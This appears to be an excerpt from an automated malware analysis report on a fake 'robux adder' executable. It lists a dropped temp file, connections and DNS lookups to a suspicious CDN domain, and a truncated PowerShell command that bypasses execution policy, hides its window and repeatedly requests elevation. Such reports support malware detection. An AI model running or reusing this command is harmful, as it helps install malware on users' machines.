Technical Information
- %TEMP%\49783robuxadder236_507544_17.exe
- 'fi###.di-cdn.xyz':443
- 'google.com':443
- DNS ASK fi###.di-cdn.xyz
- DNS ASK google.com
- ClassName: 'HTML Application Host Window Class' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -exe Bypass -w 3 -C [console]::BackgroundColor=1;cls;echo 'Starting Installation...';while($true){try{start-process powershell.exe -verb runAs -argumentlist """-exec Bypass -wi 1 -C `$cc=new-o...' (with hidden window)